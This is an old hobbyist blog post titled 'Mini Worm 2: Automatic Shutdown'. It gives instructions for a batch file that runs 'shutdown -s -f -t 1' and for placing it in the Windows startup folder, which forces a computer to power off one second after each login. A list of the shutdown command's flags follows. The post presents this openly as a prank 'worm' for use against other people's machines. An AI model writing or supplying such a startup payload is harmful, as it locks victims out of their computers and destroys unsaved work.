Friday, September 17, 2010

Mini Worm 2: Automatic Shutdown

In notepad type:
shutdown -s -f -t 1

save as a .bat file.
Add it to startup(method explained below)

-s =shutdown
-r =restart
-t =time
-f =force close all programs
-l =log off
-c"message here" =displays messgae

No comments:

Post a Comment